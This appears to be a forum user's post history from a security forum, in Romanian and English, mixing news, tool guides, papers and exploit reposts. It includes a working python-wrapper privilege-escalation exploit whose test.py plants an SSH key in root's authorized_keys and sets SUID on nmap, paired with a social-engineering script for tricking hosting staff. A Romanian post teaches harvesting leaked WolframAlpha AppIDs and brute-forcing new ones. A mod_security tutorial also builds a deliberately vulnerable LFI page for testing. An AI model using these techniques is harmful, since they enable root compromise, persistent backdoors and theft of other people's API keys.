-
Posts
676 -
Joined
-
Last visited
-
Days Won
7
Everything posted by DarkyAngel
-
tu vezi de când e topicul..?
-
SENDING ALL YOUR NETWORK TRAFFIC OVER TOR NETWORK What do we need? You do need the following: - Tor or Vidalia Download Link : https://www.torproject.org/dist/torbrowser/tor-browser-2.2.37-1_en-US.exe - Proxifier Lastet Version Download Link : http://www.proxifier.com/distr/ProxifierSetup.exe How does it work? Almost all your network traffic travels over TOR Network like : RPD, MSN, HTTP, SSH, GAMES, METASPLOIT, ETC. Before we start 1. Install TOR 2. Install Proxifier Configuration 1. Open TOR Client (Make Sure Is Conected) 2. Now Open Proxifier Then go to "Profile > Proxy Servers..." Now Click In "Add..." Then Set This Options * Address: 127.0.0.1 * Port : 9050 (default Tor client port) * Protocol : SOCKS Version 5 Then Click "OK" If you get this message: Click "YES" and then "OK" and "OK" again OK NOW THE PROXFIER IS CONFIGURED AND READY TO USE Now We testing if it works .... I Will try to connect to some random RPD sever It Works !!!!! Some Notes - Resolving DNS over TOr Go to "Profile > Name Resolution" - Unmark "Detect DNS settings automatically" - Then Mark "Resolve hostnames through proxy" - Now Click "OK" Sursa: RW
-
Buffer Overflow Explanation Paper download : http://dl.packetstormsecurity.net/papers/attack/bufferoverflow.pdf Video explanation ( using C ) : Sursa: rw
-
The pair, who are linked to a malware network that stole more than $100 million, are already in custody in the U.K. Microsoft released the identities of two alleged members of the Zeus botnet crime ring, which used an estimated 13 million computers infected with the malware to steal more than $100 million. The botnet operators used the software to show fake or modified Web sites when victims tried to use real banking sites, log their keystrokes to capture victims' identity information, and then use that information to steal money from victims' accounts. The software giant announced today it had amended a complaint last week to add Yevhen Kulibaba and Yuriy Konovalenko as defendants. The pair is already serving time in the U.K. for other Zeus-related convictions, Microsoft said. "Our best efforts to identify the remaining John Doe defendants turned up no response," Richard Domingues Boscovich, senior attorney with Microsoft's digital crimes unit, said in a company blog post. "We will continue our efforts to serve defendants Kulibaba and Konovalenko, and the John Doe defendants, with this amended complaint." Boscovich also noted that since simultaneous raids in March, Zeus botnet infections had declined by about 50 percent. Microsoft and financial services organizations, with an escort of U.S. Marshals, seized command-and-control servers during raids in Scranton, Pa., and Lombard, Ill. "These successful results represent a significant advancement for the people that Microsoft, the financial industry and law enforcement are all focused on protecting as customers and citizens," Boscovich said. Over the past three years, Microsoft used court orders to seize command-and-control servers, which run networks of infected machines called botnets, to cripple the operations of the Waledac, Rustock, and Kelihos botets. The takedown of the Rustock botnet cut the volume of spam across the world by one-third, Symantec reported in March 2011. At its peak, the notorious botnet was responsible for sending out 44 billion spam messages per day, or more than 47 percent of the world's total output, making it the leading purveyor of spam. Sursa
-
?tiu c? este m-am, nu l-am corectat deloc, doar am subliniat ce a scris prima oar?. acum a editat si a scris "mam" ..
-
nu se prea vede.. // anyway, welcome !
-
dac? îl la?i la enc.. vin în alt? zi )) ( just kidding ) ar trebui s? vedem cam fiecare pe când poate, m?car s? ne strângem mai mul?i de pe rst .. poate ajung ?i eu vara asta
-
Security Research - IIS Short File/Folder Name Disclosure PoC: http://www.exploit-db.com/sploits/19525.zip Paper: http://www.exploit-db.com/download_pdf/19527 Security Research - IIS Short File/Folder Name Disclosure Website : http://soroush.secproject.com/blog/ I. BACKGROUND --------------------- "IIS is a web server application and set of feature extension modules created by Microsoft for use with Microsoft Windows. IIS is the third most popular server in the world." (Wikipedia) II. DESCRIPTION --------------------- Vulnerability Research Team discovered a vulnerability in Microsoft IIS. The vulnerability is caused by a tilde character "~" in a Get request, which could allow remote attackers to diclose File and Folder names. III. AFFECTED PRODUCTS --------------------------- IIS 1.0, Windows NT 3.51 IIS 2.0, Windows NT 4.0 IIS 3.0, Windows NT 4.0 Service Pack 2 IIS 4.0, Windows NT 4.0 Option Pack IIS 5.0, Windows 2000 IIS 5.1, Windows XP Professional and Windows XP Media Center Edition IIS 6.0, Windows Server 2003 and Windows XP Professional x64 Edition IIS 7.0, Windows Server 2008 and Windows Vista IIS 7.5, Windows 7 (error remotely enabled or no web.config) IIS 7.5, Windows 2008 (classic pipeline mode) Note: Does not work when IIS uses .Net Framework 4. IV. Binary Analysis & Exploits/PoCs --------------------------------------- Tilde character "~" can be used to find short names of files and folders when the website is running on IIS. The attacker can find important file and folders that they are not normaly visible. In-depth technical analysis of the vulnerability and a functional exploit are available through: http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/ V. SOLUTION ---------------- There are still workarounds through Vendor and security vendors. Using a configured WAF may be usefull (discarding web requests including the tilde "~" character). VI. CREDIT -------------- This vulnerability was discovered by: Soroush Dalili (@irsdl) Ali Abbasnejad VII. REFERENCES ---------------------- http://support.microsoft.com/kb/142982/en-us http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/ VIII. DISCLOSURE TIMELINE ----------------------------- 2010-08-01 - Vulnerability Discovered 2010-08-03 - Vendor Informed 2010-12-01 - Vendor 1st Response 2011-01-04 - Vendor 2nd Response (next version fix) 2012-06-29 - Public Disclosure Sursa
-
Python-wrapper executes any test.py script within the current working directory, when supplied with help('modules'). A non-priviledged user may gain code execution by tricking root to help('modules') or help() and then modules from within python-wrapper while within a non-priviledged user's work directory. # python-wrapper untrusted search path/code execution vulnerability # # Python-wrapper executes any test.py script within the current working directory, when supplied with help('modules'). # A non-priviledged user may gain code execution by tricking root to help('modules') or help() and then modules from within python-wrapper # while within a non-priviledged user's work directory. # # The evil file MUST be titled test.py! os.system("evilcommand") will result in python-wrapper executing said command, and then continuing normally # with no signs of compromise if you redirect command output. os.system("/bin/echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys") does not # work, however os.system("/bin/echo $(echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys)") does. # # # Additionally, nmap makes a great backdoor from a non-priviledged user account because it's something that looks like you might actually # want SETUID under certain circumstances, but not really(and it will bitch if invoked). In nmap 5.31DC1 the most useful switch(--interactive) was removed # which previously allowed you to bang out a shell(!/bin/csh, but not bash). Thank you David/Juan Carlos Castro for breaking one of my favorites. # NOW however there is the nmap scripting engine to exploit. As usual, the input-output commands will behave like any exploitable SETUID program # with input-output commands. # # # A practical example of how this vulnerability could be useful is if you wish to attack a shared webhosting enviornment. # After convincing root(support) to cd in to your directory, perhaps by uploading a broken "distraction.py" and getting him to troubleshoot it, # you could pose the question: "Hey, what python modules do you guys have installed?" "I'm not quite sure how to list that..." # "You can list the modules installed by entering python-wrapper, and typing help('modules')" "Oh!" *silent test.py execution by root* # "There's a lot of them... would you like them as an email attachment?" "Yeah, thanks. I think I'll look at that and try troubleshooting this more myself". # # # - ShadowHatesYou (Shadow@SquatThis.net) # 6/30/12 root@tourian:/home/shadow/python# ls -hl test.py -rw-r--r-- 1 shadow shadow 137 Jun 30 13:06 test.py root@tourian:/home/shadow/python# cat test.py #!/bin/python import os os.system('/bin/echo $(echo "ssh-rss pwned byshadow" >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap') root@tourian:/home/shadow/python# ls -hl /usr/bin/nmap -rwxr-xr-x 1 root root 1.9M Jun 30 13:06 /usr/bin/nmap root@tourian:/home/shadow/python# ls -hl /root/.ssh/authorized_keys ls: cannot access /root/.ssh/authorized_keys: No such file or directory root@tourian:/home/shadow/python# python-wrapper Python 2.7.3 (default, May 4 2012, 00:13:26) [GCC 4.6.2] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> help('modules') Please wait a moment while I gather a list of all available modules... ArgImagePlugin _bisect email pprint BaseHTTPServer _codecs encodings pptransport Bastion _codecs_cn errno ppworker BdfFontFile _codecs_hk exceptions profile BeautifulSoup _codecs_iso2022 fcntl pstats BeautifulSoupTests _codecs_jp filecmp pty BitTornado _codecs_kr fileinput pwd BmpImagePlugin _codecs_tw fnmatch py_compile BufrStubImagePlugin _collections formatter pyclbr CDROM _cracklib fpformat pydoc CGIHTTPServer _csv fractions pydoc_data ConfigParser _ctypes ftplib pyexpat ContainerIO _ctypes_test functools pyrit_cli Cookie _curses future_builtins pyximport Crypto _curses_panel gamin quopri CurImagePlugin _elementtree gc random Cython _emerge gdbm re DLFCN _functools genericpath readline DcxImagePlugin _gamin gentoolkit repoman DocXMLRPCServer _gv getopt repr EpsImagePlugin _hashlib getpass resource ExifTags _heapq gettext rexec FitsStubImagePlugin _hotshot git_remote_helpers rfc822 FliImagePlugin _imaging glob rlcompleter FontFile _imagingft grp robotparser FpxImagePlugin _imagingmath gv rrdtool GbrImagePlugin _io gzip runpy GdImageFile _json hashlib scapy GifImagePlugin _lcms heapq sched GimpGradientFile _ldns hmac scipy GimpPaletteFile _locale hotshot select GribStubImagePlugin _lsprof htmlentitydefs sets HTMLParser _md5 htmllib setuptools Hdf5StubImagePlugin _multibytecodec httplib sgmllib IN _multiprocessing ihooks sha IcnsImagePlugin _pyio imaplib shelve IcoImagePlugin _random imghdr shlex ImImagePlugin _sha imp shutil Image _sha256 importlib signal ImageChops _sha512 imputil site ImageCms _socket inspect smtpd ImageColor _sre io smtplib ImageDraw _ssl itertools sndhdr ImageDraw2 _strptime java_config_2 socket ImageEnhance _struct javatoolkit spwd ImageFile _symtable json sre ImageFileIO _testcapi keyword sre_compile ImageFilter _threading_local lcms sre_constants ImageFont _unbound ldns sre_parse ImageGL _warnings ldnsx ssl ImageGrab _weakref lib2to3 stat ImageMath _weakrefset libsvn statvfs ImageMode _xmlplus libxml2 string ImageOps abc libxml2mod stringold ImagePalette aifc libxslt stringprep ImagePath antigravity libxsltmod strop ImageQt anydbm linecache struct ImageSequence argparse linuxaudiodev subprocess ImageShow array locale sunau ImageStat ast logging sunaudio ImageTk asynchat lxml svn ImageTransform asyncore macpath symbol ImageWin atexit macurl2path symtable ImtImagePlugin audiodev magic sys IptcImagePlugin audioop mailbox sysconfig JpegImagePlugin base64 mailcap syslog McIdasImagePlugin bdb markupbase tabnanny MicImagePlugin binascii marshal tarfile MimeWriter binhex math telnetlib MpegImagePlugin bisect md5 tempfile MspImagePlugin bs4 mhlib termios OleFileIO bz2 mimetools test OpenIPMI cPickle mimetypes textwrap PAM cProfile mimify this PIL cStringIO mirrorselect thread PSDraw calendar mmap threading PaletteFile cgi modulefinder time PalmImagePlugin cgitb multifile timeit PcdImagePlugin chunk multiprocessing toaiff PcfFontFile cmath mutex token PcxImagePlugin cmd netrc tokenize PdfImagePlugin code netsnmp trace PixarImagePlugin codecs new traceback PngImagePlugin codeop nis tty PpmImagePlugin collections nntplib types PsdImagePlugin colorsys ntpath unbound Queue commands nturl2path unboundmodule SgiImagePlugin compileall numbers unicodedata SimpleHTTPServer compiler numpy unittest SimpleXMLRPCServer contextlib opcode urllib SocketServer cookielib operator urllib2 SpiderImagePlugin copy optparse urlparse StringIO copy_reg os user SunImagePlugin cpyrit os2emxpath uu TYPES cracklib ossaudiodev uuid TarIO crypt paramiko warnings TiffImagePlugin ctypes pdb weakref TiffTags curses pickle webbrowser UserDict cython pickletools whichdb UserList datetime pipes wsgiref UserString dbm pkg_resources xattr WalImageFile decimal pkgutil xcbgen WmfImagePlugin difflib platform xdelta3main XVThumbImagePlugin dircache plistlib xdrlib XbmImagePlugin dis popen2 xen XpmImagePlugin distutils poplib xml _LWPCookieJar dnet portage xmllib _MozillaCookieJar doctest posix xmlrpclib _OpenIPMI drv_libxml2 posixfile xxsubtype __builtin__ dumbdbm posixpath yasm __future__ dummy_thread pp zipfile _abcoll dummy_threading ppauto zipimport _ast easy_install ppcommon zlib Enter any module name to get more help. Or, type "modules spam" to search for modules whose descriptions contain the word "spam". >>> quit() root@tourian:/home/shadow/python# ls -hl /usr/bin/nmap -rwsr-xr-x 1 root root 1.9M Jun 30 13:06 /usr/bin/nmap root@tourian:/home/shadow/python# cat /root/.ssh/authorized_keys ssh-rss pwned byshadow # Wish I had DuoSecurity! # See you at Defcon! Be happy with the root privileges using python. Sursa
-
Dac? este una "moca", are limit? la 2.000 query-uri pe lun? parc?, po?i face ca, dup? ce se epuizeaz? una s? treac? automat la urm?toarea, sau poate g?se?ti una premium. sau chiar s? le ?i vinzi, po?i face destule.. //L.E:
-
?i totu?i...
-
Introducere && Preview Wolfram|Alpha: Computational Knowledge Engine ( WolframAlpha pe scurt ) e o unealt? fantastic? ( dac? nu, simplu CEA MAI BUN? ) pentru a calcula informa?ii arbitrare folosind diverse forme de sintaxe. Interesant, majoritatea userilor nu ?tiu cum s? foloseasc? aceast? unealt? la poten?iatlul ei maxim. Normal, interfa?a care face toate aceste calcule este disponibil? printr-un browser. Pentru utiliz?ri specifice ( ceea ce ne intereseaz? pe noi ) , exist? un API pe care userii îl pot folosi s? execute query-uri, ?i s? primeasc? rezultate pe care le pot procesa automat. Pentru a folosi acest API, avem nevoie de un AppID VALID ( citi?i din nou )... un AppID valid ! Logica e c? utilizatorii ar trebui s? ?in? AppID-urile secrete, departe de ochii lumii, dar, dup? cum spuneam, doar ar trebui. De aici, folosind puterea f?r? mil? a google-ului, putem afla multe detalii "picante". De exemplu , un simplu query privat ar ar?ta a?a: de aici, deducând logic, ?i combinând cu puterea google-ului ajungem la concluzia urm?toare: doar c?utând 2 minute pe google, am g?sit 17 appid-uri UNICE! Apoi am notificat chestia urm?toare: formatul AppID-ului , cum urmeaz?: AppID Format (XXXXXX-XXXXXXXXXX) 6 hex chars + hyphen + 10 hex chars. Testul de validitate al AppID-ului Bazat pe ni?te scripturi anterioare, am f?cut scriptul de verificare a AppID-ului (check-wa-appid.sh) : [bash] appid testing - Pastebin.com Am pus toate AppID-urile într-un fi?ier text (appid-list.txt) ?i am creat un loop extern pentru a testa fiecare folosind check-wa-appid.sh : for x in $(cat appid-list.txt); do ./check-wa-appid.sh $x; done Data rezultat? ar trebui s? arm? urm?torul format: Timestamp {tab} AppID {tab} [VALID | INVALID | BLOCKED] Printre cele 17 AppID-uri am ad?ugat ?i pentru o verificare 'XXXXXX-XXXXXXXX' care stiu c? va ap?rea ca INVALID. Result? Pân? aici totul bine.. v? pute?i folosi lini?ti?i de ce am scris mai sus pentru a c?uta API-uri bune ?i func?ionale. dar de ce s? ne limit?m la câteva g?site pe google? VREM MAI MULT ! Generarea de AppID-uri ( poten?ial ) Acum c? ?tim formatul unui AppID , nu ne poate opri nimeni de la creerea random a acestora, chiar dac? nu se ?tie algoritmul de generare a acestora, fie c? sunt generate random ?i ad?ugate într-o baz? de date, fie dup? un algoritm anume. Deci, f?r? prea multe introduceri: Generarea unui milion de AppID-uri ia sub o or? pe sisteme moderne, iar validarea acestora ia mai multe ( aproape de 6 ori mai mult ). Interesant, din 1 milion de AppID-uri generate, în jur de 100k sunt UNICE, generând 1milion de AppID-uri UNICE ar dura ?i mai mult. Cerin?e pentru demonstrare gen-wa-1M.sh – genereaz? un milion de AppID-uri, filtreaz? unicele ?i le reshuffleaz? pentru validare. [bash] gen-wa-1m - Pastebin.com gen-wa-appid.sh – genereaz? un singur AppID pentru validare ( folosit de gen-wa-1M.sh ). [bash] gen-wa-appid - Pastebin.com check-wa-appid.sh – valideaz? poten?ialul AppID ( l-am ar?tat mai sus ) Artefacte appid-list.txt - con?ine AppID-uri pentru validate log-wa-appid.txt - con?ine validarea AppID-urilor [VALID, INVALID, BLOCKED] De aici v? descurca?i. Din nefericire.. pot exista miliarde de combina?ii , sau un infinit de ele, dar po?i porni aceste scripturi ?i po?i uita de ele.. totu?i , va lua mult. Referin??
-
?tiu c? normal trimit acas?, dar m? refer la astea mobile. // despre astea care le prime?ti acas?, ?tiu pe cineva, l-a prins cu 220 km/h pe drum jude?ean, le-a zis c? n-are acte nimic la el ca le-a uitat, a pl?tit amenda aia pentru acte, ?i au zis c? îi trimite acas?, ?i dac? în decurs de 2 luni parc? nu le-a r?spuns, nu le-a luat de la po?t?, "n-a fost acas?" când au venit ?ia în ultimele zile, s-au contramandat ?i nu i-au mai putut face nimic..
-
dafuq? ?i te-a l?sat s? pleci a?a u?or? f?r? amend? / nimic? p?i dup? câte ?tiu eu , astea noi, mobile nu-?i pot trimite acas?, nu au sistem pentru a?a ceva, sunt proiectate s? te vad? de la 1km, ?i nu au mai implementat sistem de "trimitere acas?" .
-
I'm in >> PHP .
-
trebuia s? fi specificat asta. ( ?i cu un search pe google le-ai fi g?sit: sqlinject-finder - Script parses through a pcap and looks for common SQL inject characteristics - Google Project Hosting DeFACed page - Pastebin.com )
-
Sursele? // again , skiddie tools
-
depinde ?i de site.. nu peste tot merge. dac? e cu activare instant, nu prea verific? lumea, dar ?i invers, am înteles c? cineva a primit c?r?i de prin norvegia cu valoare de 80$+ la 0.1$ livrate acas? .
-
Una din cele mai mari probleme întâlnite online este costul unei securit??i pentru web applications. Este comun în UK de exemplu, s? pl?te?ti o tax? zilnic? de ~£1000 pentru ca site-ul t?u s? fie testat de un consultant în securitatea aplica?iilor. Firewallurile pentru Web Applications pot fi la fel de rele. Furnizorii foarte r?spândi?i cere în jur de 15.000$ pentru un "software virtual appliance" ?i 20.000$ pentru o versiune hardware cu support pentru 12 luni. Cu toate astea, costurile WAF au fost recent t?iate , odat? cu introducerea serviciilor de firewall bazate pe cloud. Ideea din spatele acestui tip de produs este c? firewallul poate acoperi mai mult decât un server de aplica?ie. Acest tutorial va discuta utilizarea unui firewall open source pentru web applications ?i furnizarea conceptului ideii de a crea un 'appliance' cu acesta. În timp ce o discu?ie în profunzime despre securitatea web applica?iilor este dincolo de scopul acestui articol, cred c? sunt 3 c?i diferite prin care po?i securiza aplica?ia ta web: Secure Development Life Cycle (SDLC) Web Application Testing Web Application Firewall (WAF) Developerii ar trebui s? încoroporeze fiecare concept în creerea aplica?iei lui web, dar noi ne vom concentra pe WAF. Mod Security Mod Security este un firewall gratuit open source pentru web applications care a fost recent achizi?ionat de Trustwave ca parte din diviziunea lor de research SpiderLabs. Asta le permite s? developeze complet?ri rapide ?i s? le pun? în comunitate pentru a fi testate. Mod Security este unul dintre cele mai des folosite ?i între?inute WAF-uri disponibile. Ca atare, este nevoie de mult reseach ?i multe proiecte adi?ionale au fost construite pe asta, ?i toate pot fi g?site pe Website-ul Mod Security Acest web application firewall a fost creat pentru a securiza un webserver Apache. Exist? un num?r mare de port?ri care sunt curent f?cute disponibile. Ele pot fi g?site pe website, dar sunt înc? în developare. Metoda discutat? în acest articol intercepteaz? toate requesturile ?i trimite requesturile acceptate / parsate c?tre web serverul relevant însemnând c? nu va securiza doar un server Apache, ci toate serverele disponibile. Preg?tirea Ca s? demonstrez ce vrem s? discut?m, vom folosi dou? ma?ini virtuale. Acest exemplu va folosi Ubuntu Minimal 10.04 pentru c? este cel mai rapid install pe care l-am g?sit ?i pentru c? nu va ajunge un live server, a?a c? nu conteaz? ce folosesc. V? pute?i prepara ma?inile virtuale în acela?i fel dac? dori?i s? urm?ri?i tutorialul cu ce fac, ?i nu doar s? îl citi?i. Imaginea de mai jos arat? set?rile care le aleg la stagiul de selectare a software-urilor a instal?rii. Aceasta din nou m? ajut? s? gr?besc procesul ?i voi pute?i decide s? instala?i Apache, PHP ?i MySQL, etc, manual. De asemenea am instalat OpenSSH ca s? pot avea acces SSH din pc-ul meu ?i s? nu trebuiasc? s? intru în VM când este pornit. Am creat dou? VM-uri cu acelea?i configura?ii, în afara hostname-ului. Asta pentru a putea emula un server ca fiind WAF, iar cel?lalt ca fiind serverul aplica?ie. Fi?i siguri c? connexiunile sunt 'bridged' pe local network pentru ca VM-urile s? comunice. Urm?toarele dou? sec?iuni sunt dedicate set?rii unui PoC ( proof of concept ) func?ional despre ce vreau s? discut?m. V? rog s? re?ine?i c? acesta nu este un ghid exhaustiv, sau calea pe care a? urma-o în realitate. Dac? decizi s? faci asta, ar trebui s? cite?te mai detaliat despre securitatea folosind un reverse proxy ?i configurarea mod security Setarea clientului Ca s? test?m c? WAF merge odat? ce l-am setat, avem nevoie s? creem o vulnerabilitate în client. Cea mai simpl? cale s? test?m asta ar fi s? creem o vulnerabilitate "lfi ( local file inclusion )" pe server. Din moment ce am instalat serverul LAMP putem folosi PHP s? creem asta f?când urm?toarele: cd /var/www/ nano include.php în fi?ierul include.php ad?ug?m <? $i = $_GET['i']; include ($i); ?> Acest script preia simplu parametrul i din requestul GET ?i îl include în include.php. Acum , introducând pagina http://ADRESA-IP/include.php?i=/etc/passwd putem vedea: Deci ce facem noi aici este s? includem fi?ierul passwd din folderul /etc. Acesta este o metod? comun? în raporturile pentesting la site-urile care au LFI, deoarece arat? un fi?ier care nu este accesibil din aplica?ia web. Acum c? clientul e preg?tit, putem configura WAF-ul. Setarea WAF-ului Sunt multe c?i diferite de a instala mod security: surs?, installere sau managere de package-uri. Ultima versiune a mod security la timpul scrierii acestui tutorial este 2.6.0 ?i poate fi g?sit AICI. Din nou, ca mai sus, o s? fac ni?te o s? "tai unele col?uri" ?i s? instalez o versiune mai veche a tutorialului din package manager, deoarece am nevoie s? ar?t doar protec?ia cross server. Din fericire de ajuns, acest sistem de operare are un install foarte u?or la mod security care l-am g?sit AICI. Dac? sunt probleme cu accesul sau nu ai destule permisiuni folse?te SUDO. sudo apt-get install libapache2-mod-security a2enmod mod-security nano /etc/apache2/conf.d/mod-security Aici introduce?i: <IfModule security2_module> Include modsecurity-rules/*.conf Include modsecurity-rules/base_rules/*.conf </IfModule> apoi continua?i: mkdir /etc/apache2/modsecurity-rules cd /etc/apache2/modsecurity-rules wget tar -xvf modsecurity-apache_2.5.12.tar.gz rm -rf CHANGELOG LICENSE READ util sudo service apache2 restart Asta e tot! Din nou, dac? ai probleme cu întregul proces, folose?te SUDO ex. sudo su. Acum c? e instalat, este timpul s? connect?m cele 2 servere ?i s? protej?m pagina vulnerabil? cu acest WAF. Reverse Proxy Abilitatea WAF-ului s? acopere mai multe servere este posibil? folosind ceea ce este cunoscut ca "reverse proxy". Un "reverse proxy" func?ioneaz? ca un gateway pentru servere ?i permite unui server web s? furnizeze informa?ii pentru al?ii într-o manier? transparent?. Poate fi folosit pentru stocarea în cache a informa?iilor de la client ?i ca atare s? creasc? performan?a ?i ( în acest caz ) s? securizeze. Este recomandat ca, dac? decizi s? faci asta, s? faci cercet?ri în vulnerabilit??ile cauzate de folosirea 'reverse proxy' ?i c?i de securizare împotriva atacurilor r?u-inten?ionate. Configura?ia proxy este f?cut? în totalitate pe serverul WAF - serverul client nu are nevoie de nici-o configura?ie. În acest caz, vom schimba fi?ierul default /etc/apache2/sites-enabled/000-default . Acest fi?ier este "apelat" de fi?ierul httpd.conf ( sau în acest caz, apache2.conf ) ?i inclus la sfâr?it. Ca s? începem avem nevoie s? pornim modului proxy ?i asta poate fi f?cut simplu ad?ugând urm?toarele 2 linii la începutul fi?ierului. sudo /etc/apache2/sites-enabled/000-default LoadModule proxy_module /usr/lib/apache2/modules/mod_proxy.so LoadModule proxy_http_module /usr/lib/apache2/modules/mod_proxy_http.so Acum avem nevoie ca proxy-ul s? fac? request c?tre webserverul client. Din nou, se face simplu ad?ugând câteva linii în containerul hostului virtual. ProxyRequests off ProxyPass / http://ADRESA-IP/ ProxyPassReverse / http://ip-address/ ... ?i ASTA E ! Ai acum un WAF care acoper? un server complet separat. Acum, când chemi IP-ul firewallului, acesta preia requestul, îl parseaz? ?i se asigur? c? e un request genuine verificându-l prin mod security. Apoi îl trimite c?tre serverul client , iar acesta trimite înapoi r?spunsul. Lua?i o privire la pagina vulnerabil? acum. Mod security ?tie c? /etc/passwd nu e un request normal, ?i nu e normal s? se întâmple într-o aplica?ie web, a?a c? arat? eroarea. Acesta este un exemplu ufoarte simplu despre cum putem folosi mod security s? acoperim un server separat de cel pe care st?. Este un exemplu bun a ceea ce un 'reverse proxy' poate face, ?i cum folose?ti numai modific?ri Apache ( mod security ) ?i acoperi servere Java based / IIS based / etc. Cloud-ul Ce este interesant cu setarea pe care am creat-o este c? face referin?? la un IP care e pe re?eaua local?. Ce s-ar întâmpla dac? am face referin?? la ceva din afara re?elei locale? Ei bine, la fel se întâmpl? , de exemplu c?tre blogul "http://tmacuk.co.uk" . Po?i vedea din adresa IP din c?su?a URL c? facem request la WAF-ul local, dar pentru regulile prezente în fi?ierul 000-default vedem con?inutul blogului respectiv. S? ne uit?m pu?in mai departe. Când folosim Tamper Data cu requestul respectiv, observ?m c? facem request GET pentru adresa IP 192.168.0.10 ( în acest caz ). Aici e un scurt delay, dup? care returneaz? un status code 200 ?i r?spunsul de la serverul aplica?ie. Aici sunt dou? requesturi : 17:09:55.386[0ms][total 0ms] Status: pending[] GET http://192.168.0.10/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[unknown] Mime Type[unknown] 17:10:03.618[957ms][total 9214ms] Status: 200[OK] GET http://192.168.0.10/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type Diferen?a e în flagurile LOAD. Ni?te set?ri bune DNS trebuie s? fie incluse dac? aceasta era pentru o configura?ie real? de webserver. Numele domeniului trebuie s? fie asociat cu WAF-ul în loc de webserver, altfel URL-ul va sta ca adresa IP. Asta atunci, arat? ca o problem? pentru servere multiple folosite de WAF. Calea s? faci asta, ar fi s? creezi containere de host virtuale pentru fiecare hostname. În fiecare container faci regulile ProxyPass pentru a forwarda traficul c?tre serverul relevant aplica?iei respective. Concluzie Costul securiz?rii aplica?iei tale web ?i a serverului poate fi mare. Folosind alternative open source ca WAF ?i SLDC poate ajuta foarte mult ?i asta e ceea ce discut?m aici. Poti crea u?or un firewall care acoper? mai multe servere f?r? s? oferi prea multe informa?ii. În acest fel, cititorul nu poate vedea lucrurile ca set?rile ?i addons-urile diferite pe care mod security le are, sau nu, instalate. Translated from HERE
-
Servicii Seo-Internet-PC Ieftine || HTML,CSS,XML,JavaScript,HTML,PHP,MySql,Photoshop CS3,Microsoft Visual Basic 2008,Microsoft Visual Basic 2006,Internet,Windows XP,Windows Vista,Windows 7,Ubuntu,Backtrack,Instalari Programe,Instalari Jocuri,Crack-ui CRED !!!!! nu sunte?i în stare s? crea?i un site cât de cât decent ?i a?i f?cut un site de genul "http://construction-prices.com/index.php" ? )))))) //on: mai pune mâna pe ni?te tutoriale de html / php / css ?i mai experimenteaz? înainte s? începi un proiect de o a?a mare "amploare".
-
Tutoriale foarte bune g?se?ti pe www.rtfm.ro - https://www.rtfm.ro/linux/debian/peste-500-000-de-conexiuni-active-cu-nginx-pe-debian/ - https://www.rtfm.ro/linux/firewall-minimal-pentru-linux/ - https://www.rtfm.ro/linux/debian/instalare-apache-si-php-pe-debian/ ?i multe altele care î?i sunt de folos . î?i recomand s? te ui?i pe acolo, apoi s? mai revii cu întreb?ri la ce nu g?se?ti.
-
Cuprins : 1. The Backstory (DigiP) 2. Preface 3. Analyzing the Payloads (bwall) 3.1 Decoding (bwall) 3.1.1 Common Encodings (bwall) 3.2 Reverse Engineering (bwall) 3.3 Information Gathering (DigiP) 3.3.1 Identify the true IP or domain name of the attacker in the log (DigiP) 3.3.2 Identify the RFI script, and see if you can download it. (DigiP) 3.4 Advanced Information Gathering (bwall) 3.4.1 Impersonation Method (bwall) 3.4.2 Castration Method (bwall) 3.4.3 Castration Example (bwall) 4. Attacking the Attackers 4.1 Knocking the Bots Down (bwall) 4.2 Keeping them Down (bwall) 4.3 Things to look for post infection (DigiP) 5. Conclusion (bwall) 5.1 Special Thanks 5.1.1 DigiP 5.1.2 bwall 5.1.3 Thank you to MaXe Download : http://www.exploit-db.com/wp-content/themes/exploit/docs/19395.pdf
-
Cuprins : 1.0 Preface 2.0 Current State 2.1 Detection 2.2 Exploitation 2.2.1 Remote File Location 2.2.2 Obfuscation 2.2.3 Payload 3.0 The Next Step 3.1 Improving Detection 3.2 Improving Exploitation 3.2.1 Remote File Location 3.2.2 Obfuscation 3.2.3 Payload 4.0 Conclusion Download : http://www.exploit-db.com/wp-content/themes/exploit/docs/19032.pdf
-
Cuprins: 1 Preface 1.1 Current State 1.2 Moral Obligation 2 Proper Hashing Methods 2.1 Salt is good for you 2.2 Key Derivation Functions 2.2.1 PBKDF2 2.2.2 ARC4PBKDF2 2.2.3 bcrypt 3 Conclusion References and Further Reading Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/19454.pdf
-
- 2